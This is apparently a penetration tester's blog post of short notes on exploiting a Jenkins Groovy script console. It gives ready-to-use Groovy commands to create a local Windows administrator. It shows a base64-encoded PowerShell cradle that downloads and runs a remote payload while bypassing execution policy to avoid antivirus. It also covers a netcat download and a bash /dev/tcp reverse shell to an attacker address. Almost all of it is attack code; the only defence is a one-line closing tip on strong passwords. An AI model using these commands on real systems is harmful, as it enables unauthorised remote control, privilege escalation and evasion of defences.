Star InactiveStar InactiveStar InactiveStar InactiveStar Inactive
 

Hello all,

This type of posts will be a small technical notes about abusing/exploiting something. Just to not forget =)

During the last real world penetration test Jenkins was found. It was installed on Windows and my goal was to receive reverse shell and avoid possible AV detection.

A part how I gained an access to Jenkins is not here, only small technical notes =)

Also a part about powershell payload is not described here.

 

1) Add windows user with administrator rights. I know that you think it is simple and it is true =)

def process = "cmd /c net user username SECUREPASSWORD /delete".execute()
println "${process.text}"

def process = "cmd /c net localgroup administrators username /add".execute()
println "${process.text}"

Creating an user and adding to administrator group are not stealthy actions, but I put it here for a history.

 

2) Powershell execution in groovy script

PS command: iex (New-Object Net.WebClient).DownloadString('https://HOST/payload')

Encode: echo "iex (New-Object Net.WebClient).DownloadString('https://HOST/payload)" | iconv --to-code UTF-16LE | base64 -w 0

Result: aQBlAHgAIAAoAE4AZQB3AC0A....UAdAAuAFcAZQBiAEMAbABpAGUA

String to execute: cmd.exe /c PowerShell.exe -Exec ByPass -Nol -Enc BASE64string

Groovy: def process = "cmd.exe /c PowerShell.exe -Exec ByPass -Nol -Enc aQBlAHgAIAAoA...A".execute()

               println "${process.text}"              

 

File download: powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://HOST/nc64.exe', 'C:\Jenkins\nc64.exe') }"

Encode: echo "& { (New-Object Net.WebClient).DownloadFile('https://HOST/nc64.exe', 'C:\Jenkins\nc64.exe') }" | iconv --to-code UTF-16LE | base64 -w 0

Groovydef process = "cmd.exe /c PowerShell.exe -Exec ByPass -Nol -Enc Base64String".execute()

               println "${process.text}"  

 

3) And reverse shell for Jenkins on Linux =) Thank you pentestmonkey for Java reverse shell.

Groovy:

r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/IPADDR/PORT;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()

 

P.S.: set strong password on your Jenkins

 

Thank you for reading

Add comment


Security code
Refresh